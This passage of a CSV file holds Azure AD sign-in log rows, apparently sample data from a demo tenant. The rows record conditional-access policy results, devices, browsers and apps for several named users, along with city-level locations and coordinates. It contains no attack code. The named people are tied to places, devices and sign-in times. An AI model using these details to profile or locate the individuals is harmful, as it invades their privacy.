'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:04,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4130ca1d-0d16-4aad-a433-4063d8462100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4130ca1d-0d16-4aad-a433-4063d8462100,SigninLogs,Sucess,33.0175209,35.44601059
+634,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:05.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:04,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4130ca1d-0d16-4aad-a433-406352472100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4130ca1d-0d16-4aad-a433-406352472100,SigninLogs,Sucess,33.0175209,35.44601059
+635,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,43:42.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:43,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",3765fc30-52e1-4e7f-a22e-91fd570a6e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3765fc30-52e1-4e7f-a22e-91fd570a6e00,SigninLogs,Sucess,35.01296997,-80.93171692
+636,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:38.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5ff8e03d-b216-421d-9643-ffa85998969c,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",11779f6a-e330-484b-9e89-76d9fe831500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,11779f6a-e330-484b-9e89-76d9fe831500,SigninLogs,Sucess,38.73078156,-78.17196655
+637,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:11.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:57,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",4f81df68-d275-4b53-b73e-e16a47f85300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4f81df68-d275-4b53-b73e-e16a47f85300,SigninLogs,Sucess,32.32146072,34.85319901
+638,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:45.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f7fa5667-f44a-4a74-95af-eb8e3d04d7fc,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",973ebc26-a5be-4a53-afb2-eb08f0cd1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,973ebc26-a5be-4a53-afb2-eb08f0cd1300,SigninLogs,Sucess,33.7984581,-84.38828278
+639,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:25.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:34,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",c0a3c3a6-4f57-4291-acb6-130b7c754a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c0a3c3a6-4f57-4291-acb6-130b7c754a00,SigninLogs,Sucess,32.32146072,34.85319901
+640,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:22.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,92ba860d-9087-49dc-98a4-a83eff15f0fb,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",ed279ba5-6389-4198-91ad-627ea2021500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ed279ba5-6389-4198-91ad-627ea2021500,SigninLogs,Sucess,41.90428925,-85.99833679
